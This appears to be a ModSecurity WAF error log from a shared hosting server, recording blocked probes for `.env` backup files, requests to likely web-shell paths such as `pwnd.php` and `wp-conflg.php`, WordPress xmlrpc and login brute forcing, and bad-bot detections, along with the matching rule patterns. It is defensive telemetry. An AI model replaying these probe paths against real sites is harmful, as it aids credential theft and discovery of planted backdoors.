[Tue May 26 18:03:21.688919 2026] [security2:error] [pid 960743:tid 960881] [client 208.84.100.173:24226] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.production.old"] [unique_id "ahWTEfQvEln_BHBy2zJqLwAAAI0"]
[Tue May 26 18:03:21.691945 2026] [security2:error] [pid 960743:tid 960982] [client 208.84.100.173:24506] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.production.backup"] [unique_id "ahWTEfQvEln_BHBy2zJqMAAAAPI"]
[Tue May 26 18:03:21.793983 2026] [security2:error] [pid 960743:tid 960923] [client 208.84.100.173:24248] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env.production~"] [unique_id "ahWTEfQvEln_BHBy2zJqNgAAALc"]
[Tue May 26 18:03:21.876989 2026] [security2:error] [pid 960743:tid 960746] [remote 134.209.100.212:50998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 212.100.209.134.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTEfQvEln_BHBy2zJqNwABAwI"], referer: https://triviewsolutions.com/wp-login.php
[Tue May 26 18:03:22.485970 2026] [security2:error] [pid 960743:tid 960984] [client 185.192.70.79:55643] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 79.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/simple.php"] [unique_id "ahWTEvQvEln_BHBy2zJqSgAAAPQ"]
[Tue May 26 18:03:22.624426 2026] [security2:error] [pid 960743:tid 960934] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTEvQvEln_BHBy2zJqQwAAAMI"]
[Tue May 26 18:03:22.796754 2026] [security2:error] [pid 960743:tid 960961] [client 208.84.100.173:24326] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.creatorshouse.net.md-74.webhostbox.net"] [uri "/.env~"] [unique_id "ahWTEvQvEln_BHBy2zJqUgAAAN0"]
[Tue May 26 18:03:23.524196 2026] [security2:error] [pid 960743:tid 960895] [client 185.192.70.86:45549] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/amax.php"] [unique_id "ahWTE_QvEln_BHBy2zJqYwAAAJs"]
[Tue May 26 18:03:23.572656 2026] [security2:error] [pid 960743:tid 960887] [client 84.33.242.38:48103] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.lifestylemne.me"] [uri "/wp-content/plugins/fusion-builder/readme.txt"] [unique_id "ahWTE_QvEln_BHBy2zJqZQAAAJM"]
[Tue May 26 18:03:24.653637 2026] [security2:error] [pid 960743:tid 960909] [client 185.192.70.83:31725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/update/f35.php"] [unique_id "ahWTFPQvEln_BHBy2zJqfwAAAKk"]
[Tue May 26 18:03:25.265489 2026] [security2:error] [pid 960743:tid 960976] [client 205.185.113.241:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "afstpaul.org"] [uri "/index.php"] [unique_id "ahWTFPQvEln_BHBy2zJqfgAAAOw"]
[Tue May 26 18:03:25.265950 2026] [security2:error] [pid 960743:tid 960935] [client 205.185.113.241:33974] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "afstpaul.org"] [uri "/wp-content/plugins/greeting-by-day-time/sec_upload.php"] [unique_id "ahWTFPQvEln_BHBy2zJqfAAAAMM"]
[Tue May 26 18:03:25.398004 2026] [security2:error] [pid 960743:tid 960919] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTFPQvEln_BHBy2zJqiwAAALM"]
[Tue May 26 18:03:25.451637 2026] [security2:error] [pid 960743:tid 960941] [client 185.192.70.4:53503] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 4.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/hello.php"] [unique_id "ahWTFfQvEln_BHBy2zJqlQAAAMk"]
[Tue May 26 18:03:27.173200 2026] [security2:error] [pid 960743:tid 960912] [client 82.76.238.33:59856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTF_QvEln_BHBy2zJqxwAAAKw"]
[Tue May 26 18:03:27.173350 2026] [security2:error] [pid 960743:tid 960912] [client 82.76.238.33:59856] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTF_QvEln_BHBy2zJqxwAAAKw"]
[Tue May 26 18:03:27.342386 2026] [security2:error] [pid 960743:tid 960884] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTFvQvEln_BHBy2zJqxgAAAJA"]
[Tue May 26 18:03:27.744756 2026] [security2:error] [pid 960743:tid 960879] [client 185.192.70.90:53215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/maint/bootstrap.php"] [unique_id "ahWTF_QvEln_BHBy2zJq2QAAAIs"]
[Tue May 26 18:03:28.224040 2026] [security2:error] [pid 960743:tid 960882] [client 74.7.230.31:34250] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.t9-security.eu"] [uri "/cgi-sys/404.html"] [unique_id "ahWTGPQvEln_BHBy2zJq8AAAjl0"]
[Tue May 26 18:03:28.779498 2026] [security2:error] [pid 960743:tid 960910] [client 185.192.70.82:56173] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 82.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/themes/zMousse/otuz1.php"] [unique_id "ahWTGPQvEln_BHBy2zJq_wAAAKo"]
[Tue May 26 18:03:29.054149 2026] [security2:error] [pid 960743:tid 960840] [remote 65.254.93.202:59058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.93.254.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWTGPQvEln_BHBy2zJrAgAAz2A"]
[Tue May 26 18:03:30.887098 2026] [security2:error] [pid 960743:tid 960877] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTGvQvEln_BHBy2zJrMAAAAIk"]
[Tue May 26 18:03:30.995242 2026] [security2:error] [pid 960743:tid 960914] [client 185.192.70.91:41727] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 91.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/edit-wolf.php"] [unique_id "ahWTGvQvEln_BHBy2zJrOgAAAK4"]
[Tue May 26 18:03:31.660512 2026] [security2:error] [pid 960743:tid 960938] [client 23.158.233.122:62762] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.233.158.23.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWTG_QvEln_BHBy2zJrSgAAAMY"], referer: https://www.cagmedya.com/kullanici-merkezli-web-tasarimi-nedir/
[Tue May 26 18:03:31.660640 2026] [security2:error] [pid 960743:tid 960938] [client 23.158.233.122:62762] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWTG_QvEln_BHBy2zJrSgAAAMY"], referer: https://www.cagmedya.com/kullanici-merkezli-web-tasarimi-nedir/
[Tue May 26 18:03:31.992294 2026] [security2:error] [pid 960743:tid 960919] [client 23.158.233.122:62777] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWTG_QvEln_BHBy2zJrVAAAALM"], referer: https://www.cagmedya.com/kullanici-merkezli-web-tasarimi-nedir/
[Tue May 26 18:03:33.021552 2026] [security2:error] [pid 960743:tid 960877] [client 185.192.70.88:54023] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/plugins/ubh/up.php"] [unique_id "ahWTHPQvEln_BHBy2zJrbwAAAIk"]
[Tue May 26 18:03:33.949310 2026] [security2:error] [pid 960743:tid 960995] [client 185.192.70.72:59995] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/images/bootstrap.php"] [unique_id "ahWTHfQvEln_BHBy2zJrlgAAAP8"]
[Tue May 26 18:03:34.084766 2026] [security2:error] [pid 960743:tid 960970] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTHfQvEln_BHBy2zJrjAAAAOY"]
[Tue May 26 18:03:34.980537 2026] [security2:error] [pid 960743:tid 960766] [remote 209.42.18.223:35798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahWTHvQvEln_BHBy2zJrrAAAjRY"]
[Tue May 26 18:03:35.037831 2026] [security2:error] [pid 960743:tid 960877] [client 185.192.70.97:22269] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/images/upload.php"] [unique_id "ahWTH_QvEln_BHBy2zJrsgAAAIk"]
[Tue May 26 18:03:35.241227 2026] [security2:error] [pid 960743:tid 960887] [client 185.251.19.116:34519] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.19.251.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWTH_QvEln_BHBy2zJrrgAAAJM"]
[Tue May 26 18:03:35.648327 2026] [security2:error] [pid 960743:tid 960982] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTH_QvEln_BHBy2zJruAAAAPI"]
[Tue May 26 18:03:36.208324 2026] [security2:error] [pid 960743:tid 960937] [client 185.192.70.92:31111] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/plugins/seoplugins/db.php"] [unique_id "ahWTIPQvEln_BHBy2zJrygAAAMU"]
[Tue May 26 18:03:37.202104 2026] [security2:error] [pid 960743:tid 960899] [client 185.192.70.77:36395] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/themes/pridmag/db.php"] [unique_id "ahWTIfQvEln_BHBy2zJr4wAAAJ8"]
[Tue May 26 18:03:37.340529 2026] [security2:error] [pid 960743:tid 960898] [client 82.76.238.33:60270] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTIfQvEln_BHBy2zJr6AAAAJ4"]
[Tue May 26 18:03:37.340675 2026] [security2:error] [pid 960743:tid 960898] [client 82.76.238.33:60270] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTIfQvEln_BHBy2zJr6AAAAJ4"]
[Tue May 26 18:03:38.438452 2026] [security2:error] [pid 960743:tid 960918] [client 185.192.70.69:53135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 69.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/plugins/linkpreview/db.php"] [unique_id "ahWTIvQvEln_BHBy2zJsAQAAALI"]
[Tue May 26 18:03:38.618821 2026] [security2:error] [pid 960743:tid 960888] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTIvQvEln_BHBy2zJr_AAAAJQ"]
[Tue May 26 18:03:39.296796 2026] [security2:error] [pid 960743:tid 960903] [client 216.73.161.118:48045] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cicodev.org"] [uri "/wp-login.php"] [unique_id "ahWTIvQvEln_BHBy2zJsEQAAAKM"]
[Tue May 26 18:03:39.429578 2026] [security2:error] [pid 960743:tid 960797] [remote 173.212.245.56:49330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.245.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahWTI_QvEln_BHBy2zJsGAAAizU"]
[Tue May 26 18:03:40.070376 2026] [security2:error] [pid 960743:tid 960785] [remote 91.134.89.60:59470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWTI_QvEln_BHBy2zJsJgAAvSk"]
[Tue May 26 18:03:40.347490 2026] [security2:error] [pid 960743:tid 960820] [remote 178.156.182.155:57170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTJPQvEln_BHBy2zJsMwAA4Uw"]
[Tue May 26 18:03:40.395867 2026] [security2:error] [pid 960743:tid 960893] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTI_QvEln_BHBy2zJsKwAAAJk"]
[Tue May 26 18:03:42.499555 2026] [security2:error] [pid 960743:tid 960897] [client 185.192.70.99:56759] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/modules/mod_simplefileuploadv1.3/elements/udd.php"] [unique_id "ahWTJvQvEln_BHBy2zJsZQAAAJ0"]
[Tue May 26 18:03:43.432919 2026] [security2:error] [pid 960743:tid 960999] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTJvQvEln_BHBy2zJseQAAAQM"]
[Tue May 26 18:03:43.563903 2026] [security2:error] [pid 960743:tid 960950] [client 185.192.70.91:22187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 91.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/plugins/pwnd/pwnd.php"] [unique_id "ahWTJ_QvEln_BHBy2zJsgwAAANI"]
[Tue May 26 18:03:44.752829 2026] [security2:error] [pid 960743:tid 960985] [client 185.192.70.74:28209] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/plugins/pwnd-1/pwnd.php"] [unique_id "ahWTKPQvEln_BHBy2zJsoAAAAPU"]
[Tue May 26 18:03:45.273389 2026] [security2:error] [pid 960743:tid 960881] [client 185.192.70.3:36643] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "655"] [id "900155"] [msg "WP Brute UA block"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/css/colors/midnight/admin.php"] [unique_id "ahWTKfQvEln_BHBy2zJsrQAAAI0"]
[Tue May 26 18:03:45.368977 2026] [security2:error] [pid 960743:tid 960948] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTKPQvEln_BHBy2zJsqwAAANA"]
[Tue May 26 18:03:46.036388 2026] [security2:error] [pid 960743:tid 960965] [client 185.191.171.14:32736] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/2/"] [unique_id "ahWTKvQvEln_BHBy2zJsxQAAAOE"]
[Tue May 26 18:03:46.036511 2026] [security2:error] [pid 960743:tid 960965] [client 185.191.171.14:32736] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/2/"] [unique_id "ahWTKvQvEln_BHBy2zJsxQAAAOE"]
[Tue May 26 18:03:46.811502 2026] [security2:error] [pid 960743:tid 960963] [client 185.192.70.90:25405] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/kill.php"] [unique_id "ahWTKvQvEln_BHBy2zJs0wAAAN8"]
[Tue May 26 18:03:47.529734 2026] [security2:error] [pid 960743:tid 960875] [client 146.174.191.89:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTK_QvEln_BHBy2zJs3AAAAIc"]
[Tue May 26 18:03:47.755188 2026] [security2:error] [pid 960743:tid 960911] [client 82.76.238.33:60686] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTK_QvEln_BHBy2zJs7QAAAKs"]
[Tue May 26 18:03:47.755304 2026] [security2:error] [pid 960743:tid 960911] [client 82.76.238.33:60686] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTK_QvEln_BHBy2zJs7QAAAKs"]
[Tue May 26 18:03:47.799435 2026] [security2:error] [pid 960743:tid 960974] [client 185.192.70.97:45039] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/style-engine/worksec.php"] [unique_id "ahWTK_QvEln_BHBy2zJs7gAAAOo"]
[Tue May 26 18:03:47.971110 2026] [security2:error] [pid 960743:tid 960899] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTK_QvEln_BHBy2zJs7AAAAJ8"]
[Tue May 26 18:03:49.053531 2026] [security2:error] [pid 960743:tid 960889] [client 185.192.70.99:31533] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/images/wp-conflg.php"] [unique_id "ahWTLfQvEln_BHBy2zJtCwAAAJU"]
